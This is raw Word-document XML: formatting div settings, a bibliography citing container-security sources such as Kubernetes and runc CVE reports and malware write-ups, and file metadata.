      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1847163669">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1864007398">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1872571408">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1886329393">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1893886972">
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="737243600">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1898085888">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1957518537">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1962615540">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1973099928">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2004359003">
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="2001542769">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="2006198256">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="908033949">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1919055058">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1130705152">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="3745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2918">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="277837957">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="2095399140">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="15615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216096">
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1199507036">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="2046782643">
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="579103688">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="2070182724">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2073625086">
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="140509494">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="2081707324">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2093120782">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2127699433">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="213840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jpe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Kno19</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{09BE4C48-5A78-4B2D-A7AC-4A50E59AFF92}</b:Guid>
    <b:Title>medium.com</b:Title>
    <b:Year>2019</b:Year>
    <b:LCID>en-US</b:LCID>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Inc</b:Last>
            <b:First>Knoldus</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Month>Mar</b:Month>
    <b:Day>13</b:Day>
    <b:URL>https://medium.com/@knoldus/unionfs-a-file-system-of-a-container-2136cd11a779</b:URL>
    <b:RefOrder>13</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Sri18</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{B77BA84D-AA05-4583-91B9-7ADC8065F928}</b:Guid>
    <b:Title>Linux Namespaces and cgroups as OS Primitives for Lightweight </b:Title>
    <b:Year>2018</b:Year>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Nimmagadda</b:Last>
            <b:First>Srikanth</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:JournalName>researchgate</b:JournalName>
    <b:RefOrder>14</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Ros</b:Tag>
    <b:SourceType>DocumentFromInternetSite</b:SourceType>
    <b:Guid>{7A834CBB-979D-4335-B2CF-03F0D4F5AB29}</b:Guid>
    <b:Title>Namespaces and Cgroups – the basis of Linux Containers</b:Title>
    <b:URL>https://www.andrew.cmu.edu/course/14-712-s20/applications/ln/Namespaces_Cgroups_Conatiners.pdf</b:URL>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Rosen</b:Last>
            <b:First>Rami</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:RefOrder>2</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Mot23</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{065067B7-DC47-470F-856D-7DBC2C944C8E}</b:Guid>
    <b:Title>Exploring the Threat of Software Supply Chain Attacks on Containerized Applications</b:Title>
    <b:Year>2023</b:Year>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Motahare Mounesan</b:Last>
            <b:First>Hossein</b:First>
            <b:Middle>Siadati, Sima Jafarikhah</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:JournalName>researchgate</b:JournalName>
    <b:RefOrder>3</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Cod21</b:Tag>
    <b:SourceType>Report</b:SourceType>
    <b:Guid>{71293DAD-B73E-482A-BFF0-93CCF190B50B}</b:Guid>
    <b:Title>Bash Uploader Security Incident</b:Title>
    <b:Year>2021</b:Year>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Report</b:Last>
            <b:First>Codecov</b:First>
            <b:Middle>Official</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Publisher>Codecov Security Update</b:Publisher>
    <b:RefOrder>4</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Cyb20</b:Tag>
    <b:SourceType>Report</b:SourceType>
    <b:Guid>{2A240200-C046-4CB3-83BB-9284D98E0A74}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>(CISA)</b:Last>
            <b:First>Cybersecurity</b:First>
            <b:Middle>and Infrastructure Security Agency</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>APT Compromise of Government Agencies, Critical Infrastructure, and Private Sector Organizations (SolarWinds)</b:Title>
    <b:Year>2020</b:Year>
    <b:Publisher>CISA</b:Publisher>
    <b:RefOrder>1</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Nat19</b:Tag>
    <b:SourceType>Report</b:SourceType>
    <b:Guid>{FDEAD09D-9E6D-4D53-8C76-5E40D3C2CA84}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>(NVD)</b:Last>
            <b:First>National</b:First>
            <b:Middle>Vulnerability Database</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>CVE-2019-5736: runc Container Escape Vulnerability</b:Title>
    <b:Year>2019</b:Year>
    <b:Publisher>NIST</b:Publisher>
    <b:RefOrder>5</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Nat20</b:Tag>
    <b:SourceType>Report</b:SourceType>
    <b:Guid>{3D2CB8B1-27DD-4BA2-8596-FDB349298A70}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>(NVD)</b:Last>
            <b:First>National</b:First>
            <b:Middle>Vulnerability Database</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>CVE-2020-15257: containerd-shim API Exposure Vulnerability</b:Title>
    <b:Year>2020</b:Year>
    <b:Publisher>NIST</b:Publisher>
    <b:RefOrder>6</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Max22</b:Tag>
    <b:SourceType>Report</b:SourceType>
    <b:Guid>{D3461180-4F2F-4A7D-ACFD-93F6931AE1CE}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Kellermann</b:Last>
            <b:First>Max</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>The Dirty Pipe Vulnerability (CVE-2022-0847)</b:Title>
    <b:Year>2022</b:Year>
    <b:Publisher>CM4all Report</b:Publisher>
    <b:RefOrder>7</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Nat18</b:Tag>
    <b:SourceType>Report</b:SourceType>
    <b:Guid>{B7DB8683-CFD0-4582-A223-C22129682232}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>(NVD)</b:Last>
            <b:First>National</b:First>
            <b:Middle>Vulnerability Database</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>CVE-2018-1002105: Kubernetes API Server Privilege Escalation</b:Title>
    <b:Year>2018</b:Year>
    <b:Publisher>NIST</b:Publisher>
    <b:RefOrder>8</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Pal21</b:Tag>
    <b:SourceType>BookSection</b:SourceType>
    <b:Guid>{0A508AC1-1242-4F3E-AFE4-0A80B58E44FF}</b:Guid>
    <b:Title>Unit 42</b:Title>
    <b:Year>2021</b:Year>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Research</b:Last>
            <b:First>Palo</b:First>
            <b:Middle>Alto Networks</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:BookTitle>Hildegard: New Malware Campaign Targetting Kubernetes via Kubelet API</b:BookTitle>
    <b:RefOrder>9</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Nat21</b:Tag>
    <b:SourceType>Report</b:SourceType>
    <b:Guid>{CAF17B51-4338-4D70-AFDE-FE29C39D3670}</b:Guid>
    <b:Title>CVE-2021-25741: Kubernetes Ingress Controller Information Disclosure Vulnerability</b:Title>
    <b:Year>2021</b:Year>
    <b:Publisher>NIST</b:Publisher>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>(NVD)</b:Last>
            <b:First>National</b:First>
            <b:Middle>Vulnerability Database</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:RefOrder>10</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>NVD20</b:Tag>
    <b:SourceType>Report</b:SourceType>
    <b:Guid>{EA2399BA-EB38-4079-BF68-F3F1A36F2AA0}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>NVD</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>CVE-2020-8554: Kubernetes MitM Vulnerability</b:Title>
    <b:Year>2020</b:Year>
    <b:Publisher>NIST</b:Publisher>
    <b:RefOrder>12</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>DPr21</b:Tag>
    <b:SourceType>BookSection</b:SourceType>
    <b:Guid>{D320CBEF-80D6-412D-BA07-4FF4DF81EC50}</b:Guid>
    <b:Title>Siloscape: Malware Targeting Kubernetes</b:Title>
    <b:Year>2021</b:Year>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Prizmant</b:Last>
            <b:First>D.</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:BookTitle>Siloscape: Malware Targeting Kubernetes</b:BookTitle>
    <b:RefOrder>11</b:RefOrder>
  </b:Source>
</b:Sources>
</file>

<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{4C5B1A3C-FB1F-4DAA-B461-805B5C6AC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23</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Nguyen Tuan</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Erik Horus</cp:lastModifiedBy>
  <cp:revision>9</cp:revision>
  <cp:lastPrinted>2026-07-01T06:02:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-07-01T06:08:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-07-26T17:08:00Z</dcterms:modified>
</cp:coreProperties>
</file>